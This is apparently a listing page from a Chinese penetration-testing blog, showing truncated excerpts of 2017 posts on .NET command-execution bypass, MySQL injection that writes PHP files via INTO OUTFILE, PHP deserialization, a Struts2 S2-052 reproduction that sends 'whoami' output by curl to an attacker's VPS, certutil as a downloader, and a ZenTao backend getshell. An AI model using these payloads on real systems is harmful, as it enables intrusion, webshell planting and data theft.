热门 .net突破限制执行命令

时间:2017-12-28   作者:webbaozi   分类: 小技巧   热度:1115°    
时间:2017-12-28   分类: 小技巧    热度:1115  
遇见过一次可以使用 受影响的版本为: Microsoft .NET Framework 2.0  Microsoft .NET Framework 3.5 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4 Microsoft .NET Framework 4.5 Microsoft .NET Framework 4.5.1 利用条件: 1.需要支持aspx并且高于Microsoft .NET Framework 1.14版本 2....

阅读全文>>

热门 通过mysql注入写文件

时间:2017-10-30   作者:webbaozi   分类: 小技巧   热度:1127°    
时间:2017-10-30   分类: 小技巧    热度:1127  
1. select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'   2. select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E-- 此写法需要查询出数据,才能...

阅读全文>>

热门 php反序列小记

时间:2017-10-21   作者:webbaozi   分类: 小技巧   热度:945°    
时间:2017-10-21   分类: 小技巧    热度:945  
存在反序列漏洞的php代码 <html> <head> <title>WEB</title> </head> <body> <?php class Readflag{ var $file; function __destruct(){ if(isset($this->file)){ echo file_get_contents($this->file); } } function __wakeup(){ if($this->fi...

阅读全文>>

热门 struts2-02-052复现笔记

时间:2017-9-6   作者:webbaozi   分类: 小技巧   热度:868°    
时间:2017-9-6   分类: 小技巧    热度:868  
网上已经有很多复现过程了,这里就做个笔记 vps上执行: python -m SimpleHTTPServer 8080 然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)" powershell支持curl(测试机win7powershell不支持curl,未测) POST /struts2-rest-showcase/orders/4 HTTP/1.1 Host: 192.168.1.212 User-Agen...

阅读全文>>

热门 渗透测试中的certutil

时间:2017-8-10   作者:webbaozi   分类: 小技巧   热度:2375°    
时间:2017-8-10   分类: 小技巧    热度:2375  
0x00 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充,总结base64编码转换的常用方法。 学习地址: https://twitter.com/subTee/status/888101536475344896 https://twitter.com/subTee/status/888071631528235010 0x01 简介 本文...

阅读全文>>

热门 禅道后台getshell,利用windows特性,快速确定文件名

时间:2017-7-31   作者:webbaozi   分类: 小技巧   热度:970°    
时间:2017-7-31   分类: 小技巧    热度:970  
如何上传文件请移步:http://www.webbaozi.com/dmsj/18.html 这里就不多讲了 window特性: 双引号(""") <==> 点号(".")'; 大于符号(">") <==> 问号("?")'; 小于符号("<") <==> 星号("*")'; 进入正题: index.php ?m=editor &f=edit &filePath=YWFh &action=override &isExtends...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1